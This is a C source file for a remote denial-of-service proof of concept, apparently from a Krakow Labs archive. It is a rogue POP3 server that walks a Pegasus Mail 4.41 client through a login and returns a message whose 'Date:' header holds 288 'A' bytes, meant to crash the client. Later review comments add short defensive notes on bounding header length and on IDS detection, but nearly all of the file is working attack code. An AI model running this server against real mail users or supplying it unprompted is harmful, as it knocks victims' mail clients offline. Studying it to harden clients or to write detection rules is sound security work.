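/*
 * KL0109FUN_constellation.c
 * Krakow Labs [Fun Archive] -> www.krakowlabs.com/dev/fun
 *
 * Pegasus Mail 4.41 'Date' Remote DoS
 * rush@KL
 *
 * What this file is: a minimal stand-in POP3 server. It accepts a single
 * client, answers the fixed command sequence with canned replies, and
 * returns one message whose "Date:" header value is DATESZ-1 (288) bytes
 * of 'A'. Per the title above, that header is what makes the named client
 * version stop responding.
 *
 * NOTE(review): the page does not show the client-side root cause. An
 * unbounded copy of the header value into a fixed-size buffer is the usual
 * explanation for this pattern, but confirm against the vendor's notes.
 *
 * Defensive takeaways:
 *   - A mail client has to treat every header from the server as
 *     untrusted and bound its length before copying or parsing it.
 *   - A legitimate RFC 5322 date value is a few dozen bytes long, so a
 *     "Date:" line of several hundred bytes in a RETR response is a strong
 *     anomaly signal for a POP3-aware proxy or IDS rule.
 */

/*
 * NOTE(review): the header names were stripped from the listing (seven
 * bare "#include" tokens remained). The set below is reconstructed from
 * the calls made in main(); the original names cannot be confirmed here.
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define OK      "+OK\r\n"
#define SRESP   "+OK 1\r\n"             /* STAT reply */
#define LRESP   "+OK\r\n1 100\r\n.\r\n" /* LIST reply: message 1, 100 octets */

#define BUFSZ   256
#define DATESZ  289
#define MSGSZ   (DATESZ + 64)           /* parenthesised so it expands safely */
#define PORT    110
#define TRIGNUM 289                     /* not referenced anywhere in this file */

/**
 * Serve one POP3 session with canned replies, then exit.
 *
 * @return 0 after the session completes, -1 if socket setup or accept fails
 *         (the failing call is reported through perror()).
 */
int main(void)
{
    char buf[BUFSZ], date[DATESZ], msg[MSGSZ];
    int cli, serv, i;
    struct sockaddr_in client, server;
    /* accept()/getpeername() take a socklen_t *, not an int *. */
    socklen_t clen = sizeof(client);

    /* Zero the whole structure so sin_zero padding is not stack garbage. */
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(PORT);
    server.sin_addr.s_addr = htonl(INADDR_ANY);

    if ((serv = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        /* No descriptor was created, so there is nothing to close. */
        perror("socket()");
        return -1;
    }

    if (bind(serv, (struct sockaddr *)&server, sizeof(server)) < 0) {
        perror("bind()");
        close(serv);
        return -1;
    }

    if (listen(serv, 5) < 0) {
        perror("listen()");
        close(serv);
        return -1;
    }

    if ((cli = accept(serv, (struct sockaddr *)&client, &clen)) < 0) {
        /* cli is invalid here; only the listening socket needs closing. */
        perror("accept()");
        close(serv);
        return -1;
    }

    if (getpeername(cli, (struct sockaddr *)&client, &clen) < 0) {
        perror("getpeername()");
        close(cli);
        close(serv);
        return -1;
    }

    /* Flush after printing so the peer address shows up even when piped. */
    printf("%s\n", inet_ntoa(client.sin_addr));
    fflush(stdout);

    /*
     * Pegasus Mail simply reads the banner then does
     * USER, PASS, STAT, LIST, RETR, DELE, QUIT.
     *
     * The exchange is lock-step: each send() is followed by one recv()
     * whose contents are discarded, and return values are not checked.
     */

    /* Banner -> USER, +OK -> PASS, +OK -> STAT */
    for (i = 1; i <= 3; i++) {
        send(cli, OK, strlen(OK), 0);
        recv(cli, buf, BUFSZ, 0);
        memset(buf, 0, BUFSZ);
    }

    /* STAT reply -> LIST */
    send(cli, SRESP, strlen(SRESP), 0);
    recv(cli, buf, BUFSZ, 0);
    memset(buf, 0, BUFSZ);

    /* LIST reply -> RETR */
    send(cli, LRESP, strlen(LRESP), 0);
    recv(cli, buf, BUFSZ, 0);
    memset(buf, 0, BUFSZ);

    /* RETR reply: one message whose Date header value is 288 'A' bytes. */
    memset(date, 'A', DATESZ);
    date[sizeof(date) - 1] = '\0';

    snprintf(msg, MSGSZ,
             "+OK\r\nDate: %s\r\nKL0109FUN_constellation.c\r\n.\r\n", date);

    /* Message -> DELE */
    send(cli, msg, strlen(msg), 0);
    recv(cli, buf, BUFSZ, 0);
    memset(buf, 0, BUFSZ);

    /* DELE reply -> QUIT */
    send(cli, OK, strlen(OK), 0);
    recv(cli, buf, BUFSZ, 0);

    /* QUIT reply, then tear down both sockets. */
    send(cli, OK, strlen(OK), 0);

    close(cli);
    close(serv);

    return 0;
}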